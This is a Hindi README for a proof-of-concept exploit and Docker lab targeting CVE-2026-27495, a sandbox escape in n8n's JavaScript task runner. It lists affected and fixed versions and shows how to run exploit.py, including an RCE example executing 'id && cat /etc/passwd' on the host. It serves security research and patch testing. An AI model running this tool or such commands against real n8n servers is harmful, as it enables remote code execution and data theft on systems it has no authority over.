
CVE-2026-27495 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और लैब वातावरण
होस्ट-रियल्म ऑब्जेक्ट लीक के माध्यम से n8n JavaScript टास्क रनर पर सैंडबॉक्स एस्केप।
| CVE | CVE-2026-27495 |
| CVSS | 9.4 (गंभीर) |
| CWE | CWE-94 — कोड इंजेक्शन |
| प्रभावित | n8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0 |
| समाधान | 1.123.22 / 2.9.3 / 2.10.1 |
| हमले की सतह | कोड नोड (प्रमाणित, टास्क रनर सक्षम) |
docker compose up -d
n8n प्रारंभ होने के लिए ~15 सेकंड प्रतीक्षा करें, फिर http://localhost:5678 खोलें और एक स्वामी खाता बनाएं (ईमेल: [email protected], पासवर्ड: TestPassword123!)।
pip install requests
सैंडबॉक्स एस्केप की जाँच करें :
python3 exploit.py --probe
RCE — docker-compose.yml में NODE_FUNCTION_ALLOW_BUILTIN=* की टिप्पणी हटाएँ, फिर पुनः प्रारंभ करें:
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"
पहली बार सेटअप (स्वामी खाता स्वतः बनाता है):
python3 exploit.py --setup --probe
Options:
--url URL n8n base URL (default: http://localhost:5678)
--email EMAIL Login email (default: [email protected])
--password PASSWORD Login password
--cmd CMD OS command to execute (RCE)
--setup Create owner account (fresh instance)
--probe Probe sandbox escape only (no RCE, works with any config)
--proxy PROXY HTTP proxy (e.g. http://127.0.0.1:8080)
केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।